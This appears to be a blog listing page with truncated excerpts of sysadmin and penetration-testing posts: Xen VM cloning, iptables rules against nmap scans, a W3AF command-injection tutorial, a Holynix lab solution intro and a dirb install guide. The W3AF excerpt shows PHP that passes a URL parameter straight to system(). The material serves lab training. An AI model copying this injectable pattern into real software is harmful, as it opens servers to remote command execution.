Clone/Duplicate a Xen Virtual Machine

Steps:

 

[1] Install virt-clone utility :

# apt-get install virtinst libvirt-bin  

[2] Shutdown the virtual machine that you want to clone using one of the following commands :

# xm shutdown

OR

# virsh -c xen:///

virsh # shutdown

[3]   Use the virt-clone command to create the clone and follow the questions:

# virt-clone --connect xen:/// --prompt

What is the name of the original virtual machine?
zimbra
What is the name for the cloned virtual machine?
zimbra_clone1
What would you like to use as the cloned disk (file path) for '/home/virtual-images/zimbra_ubuntu.img'?
/home/virtual-images/zimbra_ubuntu_clone.img
Cloning zimbra_ubuntu.img                                                                                     | 117 GB     09:19

Clone 'zimbra_clone1' created successfully.


[4] List the  newly cloned domU image :

# xm list

Name                                        ID   Mem VCPUs      State   Time(s)
Domain-0                                     0  9844     8     r----- 124053.5
centos                                       4  1996     1     -b----   1360.4
debian                                          1587     1                 0.0
freebsd9                                     3  1024     1     -b----    813.4
godavari                                     1  1024     1     -b----    121.3
server2008                                   2  4142     1     -b----   1403.5
zimbra                                          2048     1              8729.8
zimbra_clone1                              2048     2                 0.0

[4] Boot the new cloned VM and make changes to its networking settings

[5] Start both the old and the new VM

BLOCKING NMAP SCANS WITH PF AND IPTABLES

SAMPLE IPTABLES RULES TO BLOCK  NMAP SCANS

/sbin/iptables -t filter -A INPUT -p TCP -m state --state RELATED,ESTABLISHED -j ACCEPT
/sbin/iptables -t filter -A INPUT -p UDP -m state --state RELATED,ESTABLISHED -j ACCEPT
/sbin/iptables -t filter -A INPUT -p ICMP -m state --state RELATED,ESTABLISHED -j ACCEPT
/sbin/iptables -t filter -A INPUT -m state --state INVALID -j DROP

W3AF Command Injection and Web Application Payloads

W3AF [ Web Application Attack and Audit Framework]  is an open source web application penetration testing framework written in python. Today I will be exploiting command injection vulnerability using  W3AF's osCommanding injection module. I will also show you how one can use some of the web application payloads that comes with W3AF. The beauty of "web application payloads" is that one can use any  payload with any exploit inside of W3AF. This is similar to Metasploit Framework.

First lets view a very simple vulnerable PHP code :

root@test-box:/srv/test# cat index.php

        $cmd=$_GET['command'];

        if (isset($cmd))

                system($cmd);

        else

        {

           print 'Command Injection Example for W3AF Test';

           print 'Example : http://site/index.php?command=ls ';

        }

?>

HOLYNIX VERSION 2.0 SOLUTION

Holynix is a deliberately vulnerable Linux distribution that can be used in a Lab as a target for penetration testing. It has two versions , version 1 and version 2 and is available for download at http://sourceforge.net/projects/holynix/.

The guys at pynstrom.net have put in a lot of hard work  in creating the holynix challenges and I would like to sincerely thank them for their effort. The goal of each challenge is to obtain root shell on the holynix machine. In this article I am writing a solution for holynix version 2. I am pretty sure that there are other elegant ways to obtain root but this is how I did it. You will need Vmware to run the Holynix  version 2 Vmware images. I used backtrack 4 to carry out the attack.

The readme file that comes with holynix outline the following facts regarding network configuration :

--------------------------------

Network Configuration 

-------------------------------- 

Holynix v2 is set with static ip and requires some network configuration in order to run. 

Network: 192.168.1.0/24 Pool 

Starting Addr: 192.168.1.2 

Gateway Addr: 192.168.1.1 

Subnet Mask: 255.255.255.0

Since, holynix Version 2 is configured to automatically obtain an IP Address in the range of 192.168.1.1-255. I configured my BackTrack machine to use the IP address 192.168.1.220/24. The next logical step was to find the IP ADDRESS of the target box ; this was done using nmap ping sweep.

Brute force Directory and Files on a Web server using dirb and Backtrack 4

One of the most commonly used web application directory/files brute force tool is dirbuster from OWASP ; which is a GUI based tool written using java. Dirb is also a directory/files bruter force tool but unlike owasp Dirbuster; it is a command line utility and can be run from a shell. It is available for download at : http://dirb.sourceforge.net/


In this post I will be showing you how to install and use dirb on a machine running Backtrack 4.


[1] Change Directory to /pentest/web/


root@bt:~# cd /pentest/web/

root@bt:~# cd /pentest/web/

[2] Download the dirb tarball from http://dirb.sourceforge.net/ and expand the tarball :

root@bt:/pentest/web# wget -c 'http://sourceforge.net/projects/dirb/files/dirb/2.03/dirb203.tar.gz/download' -O dirb203.tar.gz

root@bt:/pentest/web# tar -zxvf dirb203.tar.gz

root@bt:/pentest/web# cd dirb